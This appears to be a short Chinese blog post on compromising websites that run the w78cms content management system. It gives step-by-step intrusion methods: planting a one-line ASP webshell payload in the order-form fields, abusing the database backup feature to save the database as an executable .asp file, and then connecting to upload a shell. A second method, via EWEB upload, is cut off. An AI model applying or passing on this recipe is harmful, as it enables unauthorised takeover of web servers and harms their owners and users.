国外的一个站,采用了w78cms程序,貌似这程序还挺少见,发现貌似给人搞过了,百度下前人经验,他们是这样说的:
方法一: 前提条件:对方未修改数据库的默认地址 第一步:订购页面,直接在 产品名称,订购数量等输入一句话木马 <%eval request("ha")%> 第二步:备份数据库。数据库名为asp文件(这里注意:第一次备份的时候,程序会自动添加.MDB后缀,需要备份两次)注:会弹出要你登陆的框,不要管,再执行一下备份 第三步:一句话木马连接,上传shell 方法二: 前提条件:对方未修改EWEB的默认路径 第一步:直接在EWEB里上传[......]
最新评论